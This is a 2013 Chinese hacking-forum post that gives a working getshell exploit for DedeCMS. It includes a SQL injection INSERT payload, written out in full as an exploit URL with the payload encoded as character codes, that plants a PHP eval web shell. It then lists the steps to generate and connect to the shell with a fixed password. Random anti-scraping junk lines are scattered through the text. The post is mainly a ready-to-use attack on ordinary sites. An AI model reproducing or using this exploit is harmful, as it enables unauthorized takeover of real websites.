中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
+ ^5 C% j v. S5 d5 T* h
, O$ h5 y* t- B& ~# n" _3 d
! O, H1 @( J; V2 I7 _
作者:鬼哥
3 ?9 p/ f1 X# H4 A' O8 ~ x
, Z* h* ]) O; i% l0 I& n$ n }
看贴不回,没JJ
! E @) C' O7 P
/ _ G. b7 A# z! {
漏洞大家都知道是哪个。
' X5 |6 G& `5 w8 N8 v/ k4 j( l3 L! `# z+ ~
|- J! V' w, D' p( R9 m% o# l
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
$ l( P/ ]" a7 v; e; {/ k' h
0 c- U& h- B7 C3 j
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
) k( s# o, H) }. b% }
7 k2 w: r' e) F8 ?
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
5 f! i/ W( n7 t+ K
4 s- t4 t9 R9 H2 M) f* ^* Z
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
3 w- r8 s/ ~+ u, o
' ~3 u3 |7 H% X8 {) Y
但是测试了下。。失败
' R% O6 d8 i) T, K* A" K
; @- w$ [: x' a% I2 ^7 F
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
6 D! L, Z0 t0 Y- U7 _
9 c# `& `* Q$ ?/ Z. c
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
8 o, b0 i' \' I4 J+ i5 y0 i Z
9 [) ^# i2 a3 L" Z- p3 p: F* s z! B
EXP:
/ e3 z$ |+ R5 s0 O5 b- R N5 \8 [0 h/ U
+ y- p7 w$ r; g+ F2 m
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
3 _# K# k+ B" ~/ n) e
C- z% |! R& v% y( x( {9 `. U
+ y: f) _; y. O+ }/ B
成功增加。
$ e3 W1 O5 C1 l( Z* K- V2 ]8 C
& p5 l+ I1 l8 A$ M0 ?6 j5 |
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
. o1 ~# P6 n4 o: y% b6 m+ H8 S( i
生成一句话木马.
2 p$ B7 m6 x% k% M6 M( N. [+ W
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
- I1 v; [0 s% @. Z
a0 v6 ^. [6 Q, s* C
测试OK。
' d* ^: l1 z6 Z f. O f; |9 e6 g
# _6 F4 R! V# l3 [3 F, T; l+ J
4 l) o' W! _( d3 [% Y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2